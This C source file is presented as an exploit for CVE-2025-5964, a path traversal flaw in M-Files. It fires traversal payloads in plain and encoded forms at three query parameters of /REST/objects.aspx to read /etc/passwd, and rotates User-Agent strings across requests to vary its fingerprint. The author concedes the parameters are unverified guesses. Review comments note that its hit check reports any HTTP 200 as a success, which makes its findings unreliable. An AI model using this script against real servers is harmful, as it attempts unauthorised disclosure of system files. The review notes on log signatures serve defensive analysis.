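// Byte Reaper
// Telegram : @ByteReaper0
// CVE : CVE‑2025‑5964
// File Name : exploit.c
// Des : path traversal
// Target Service : M-Files
// Version : 25.6.14925.0
// Note :
// The parameters that I have put are just my own research and are not guaranteed to be the basis of the vulnerability because I was not able to obtain an account in the service and analyze it myself.
// Therefore, all the parameters are just my own research in their documentation and on the Internet.
// I hope that whoever finds a suspicious parameter or has an account in the service,
// A free or paid version, contacts me on Telegram. This is my username @ByteReaper0.
// ==> thank you.
//---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
//
// What the program does, as far as this file shows: for each of three query
// parameters (q, o, d) on /REST/objects.aspx it sends one GET per traversal
// string, one request per second, with an "X-Requested-With: XMLHttpRequest"
// header and a User-Agent taken in rotation from a fixed list.
//
// For log review, the resulting traffic is recognisable by traversal
// sequences ("../", "%2f", "%252F" and the other encodings listed in path())
// in the query string of /REST/objects.aspx, and by the User-Agent changing
// on every request from the same client.
//
// NOTE(review): the header names of the angle-bracket includes were missing
// from this listing; the five below are restored from the functions the file
// calls. <stdint.h> is added for SIZE_MAX.
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <curl/curl.h>
#include "argparse.h"

#define FULL_URL 2000

/* Growable response buffer filled by writeF(); always NUL-terminated. */
typedef struct
{
    char *buffer; /* heap storage, owned by the caller */
    size_t len;   /* bytes stored, not counting the terminator */
} Mem;

/**
 * libcurl write callback: append one chunk of the response body to a Mem.
 *
 * @param ptr      chunk delivered by libcurl (not NUL-terminated)
 * @param size     element size
 * @param nmemb    element count
 * @param userdata the Mem passed through CURLOPT_WRITEDATA
 * @return number of bytes consumed; 0 makes libcurl abort the transfer
 *         (allocation failure or a size that would overflow size_t)
 *
 * The buffer grows without an upper bound, so the peer decides how much
 * memory a response costs.
 */
size_t writeF(void *ptr, size_t size, size_t nmemb, void *userdata)
{
    Mem *m = (Mem *)userdata;

    /* Reject sizes whose product or sum would wrap around. */
    if (size != 0 && nmemb > SIZE_MAX / size)
    {
        return 0;
    }
    size_t total = size * nmemb;
    if (total >= SIZE_MAX - m->len)
    {
        return 0;
    }

    /* Keep the old pointer until realloc succeeds so it is never lost. */
    char *tmp = realloc(m->buffer, m->len + total + 1);
    if (!tmp)
    {
        return 0;
    }
    m->buffer = tmp;
    memcpy(m->buffer + m->len, ptr, total);
    m->len += total;
    m->buffer[m->len] = '\0';
    return total;
}

/**
 * Set the User-Agent of a curl handle to the next entry of a fixed list.
 *
 * A static index advances on every call and wraps at the end of the list,
 * so consecutive requests carry different User-Agent strings.
 *
 * @param curl handle to configure
 */
void agentSend(CURL *curl)
{
    static const char *const a[] =
    {
        "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/37.0.2062.94 Chrome/37.0.2062.94 Safari/537.36",
        "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36",
        "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
        "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0",
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/600.8.9 (KHTML, like Gecko) Version/8.0.8 Safari/600.8.9",
        "Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4",
        "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36",
        "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36",
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240",
        "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0",
        "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko",
        "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36",
        "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko",
        "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0"
    };
    static size_t c = 0;
    const size_t numAG = sizeof(a) / sizeof(a[0]);

    const char *send = a[c];
    c = (c + 1) % numAG;
    curl_easy_setopt(curl, CURLOPT_USERAGENT, send);
}

/**
 * Send every combination of endpoint parameter and traversal string to the
 * given base URL and print the HTTP status of each response.
 *
 * Exits the process with status 1 if the curl handle cannot be created, if
 * memory runs out, or on the first request that libcurl reports as failed.
 *
 * @param url base URL, used as the prefix of every request URL
 */
void path(const char *url)
{
    CURL *curl = curl_easy_init();
    CURLcode res;
    if (curl == NULL)
    {
        printf("\e[1;31m[-] Error creating CURL object, Please Check your Connection !!\n");
        exit(1);
    }

    static const char *const payloads[] =
    {
        "../../../../../etc/passwd",
        "../../../../../etc/passwd%20",
        "..//..//..//..//..//etc//passwd",
        "./././././etc/passwd",
        "../\\../\\../\\../\\../\\etc/passwd",
        "..///\\..//\\..//\\..//\\..//\\etc//\\passwd",
        "../../../../../e.t.c/p.a.s.swd",
        "Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCAK",
        "..%2f..%2f..%2f..%2f..%2fetc%2fpasswd",
        "..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd"
    };
    static const char *const paths[] =
    {
        "/REST/objects.aspx?q=",
        "/REST/objects.aspx?o=",
        "/REST/objects.aspx?d=",
    };
    char full[FULL_URL];
    const size_t num = sizeof(paths) / sizeof(paths[0]);
    const size_t numPayload = sizeof(payloads) / sizeof(payloads[0]);

    for (size_t i = 0; i < num; i++)
    {
        for (size_t p = 0; p < numPayload; p++)
        {
            /* A truncated URL would request something other than what is
               printed below, so skip it instead of sending it. */
            int written = snprintf(full, sizeof(full), "%s%s%s", url, paths[i], payloads[p]);
            if (written < 0 || (size_t)written >= sizeof(full))
            {
                fprintf(stderr, "[-] URL does not fit in %d bytes, skipped\n", FULL_URL);
                continue;
            }
            sleep(1);

            /* Start with an empty, terminated string: an empty response body
               never reaches writeF(), and strstr() below would otherwise read
               an uninitialised byte. */
            Mem response = { .buffer = malloc(1), .len = 0 };
            if (response.buffer == NULL)
            {
                fprintf(stderr, "[-] Out of memory\n");
                curl_easy_cleanup(curl);
                exit(1);
            }
            response.buffer[0] = '\0';

            /* curl_slist_append() returns NULL on failure and leaves the
               existing list untouched, so keep the old head until it succeeds. */
            struct curl_slist *headers = curl_slist_append(NULL, "X-Requested-With: XMLHttpRequest");
            struct curl_slist *extended = headers ? curl_slist_append(headers, "Accept: */*") : NULL;
            if (extended == NULL)
            {
                fprintf(stderr, "[-] Out of memory\n");
                curl_slist_free_all(headers);
                free(response.buffer);
                curl_easy_cleanup(curl);
                exit(1);
            }
            headers = extended;

            curl_easy_setopt(curl, CURLOPT_URL, full);
            agentSend(curl);
            curl_easy_setopt(curl, CURLOPT_HTTPHEADER, headers);
            curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L);
            curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, writeF);
            curl_easy_setopt(curl, CURLOPT_WRITEDATA, &response);
            res = curl_easy_perform(curl);

            /* Detach the list from the handle before freeing it, on the
               success and the failure path alike. */
            curl_easy_setopt(curl, CURLOPT_HTTPHEADER, NULL);
            curl_slist_free_all(headers);

            if (res != CURLE_OK)
            {
                fprintf(stderr, "[-] curl_easy_perform() failed: %s\n", curl_easy_strerror(res));
                free(response.buffer);
                curl_easy_cleanup(curl);
                exit(1);
            }

            printf("\e[1;34m[+] URL Test : %s\n", full);
            long httpCode = 0;
            printf("\e[1;36m[+] Request sent successfully\n");
            curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &httpCode);
            printf("\e[1;32m=> HTTP CODE : %ld\n", httpCode);

            /* NOTE(review): the terms are joined with ||, so any HTTP 200
               prints the line below whether or not the body matched, and the
               words "nologin" and "admin" match ordinary pages. The message
               is therefore not evidence that a file was disclosed; confirm
               against the response body and the server's own logs. */
            if (httpCode == 200 || strstr(response.buffer, "root:x:") || strstr(response.buffer, "/bin/bash") || strstr(response.buffer, "nologin") || strstr(response.buffer, "admin"))
            {
                printf("\e[1;35m[!] Potential LFI hit – found 'root:' in response!\n");
            }
            printf("\e[0;37m---------------------------------------------------------------------------------------------------------------------------\n");

            free(response.buffer);
        }
    }
    curl_easy_cleanup(curl);
}

/**
 * Entry point: print the banner and the author's reminder, parse -u/--url
 * and hand the URL to path().
 *
 * @return 0 on completion; exits with status 1 when no URL is given
 */
int main(int argc, const char **argv)
{
    const char *url = NULL;
    struct argparse_option options[] =
    {
        OPT_HELP(),
        OPT_STRING('u', "url", &url, "Enter Target URL"),
        OPT_END()
    };

    printf(
        "\e[0;31m \n"
        " ▄▖▖▖▄▖▄▖▄▖▄▖▄▖ ▄▖▄▖▄▖▖▖\n"
        " ▌ ▌▌▙▖▄▌▛▌▄▌▙▖▄▖▙▖▙▌▙▖▙▌\n"
        " ▙▖▚▘▙▖▙▖█▌▙▖▄▌ ▄▌▄▌▙▌ ▌\n"
        " \e[1;30m @ByteReaper0\n"
    );
    printf("\e[1;34m\n[!] Reminder if you didn't read the code comments :\n");
    printf("\e[1;34m=> This is not a real exploit. I'm not sure of any parameters.\n");
    printf("\e[1;34m=> I just ran a search on the service's settings and analyzed them manually online.\n");
    printf("\e[1;34m=> I don't have a company to create an account with the service and analyze it myself.\n");
    printf("\e[1;34m=> Anyone who has an account or a trial version can contact me to modify the script and add other features.\n");
    printf("\e[0;37m---------------------------------------------------------------------------------------------------------------------------\n");

    struct argparse argparse;
    argparse_init(&argparse, options, NULL, 0);
    argparse_parse(&argparse, argc, (const char **) argv);

    /* The URL is used as given; nothing here checks its scheme or form. */
    if (!url)
    {
        printf("\e[0;31m[-] Please Enter Target URL !\n");
        printf("\e[1;36m[+] Example: ./CVE‑2025‑5964 -u http://target.com\n");
        exit(1);
    }
    path(url);
    return 0;
}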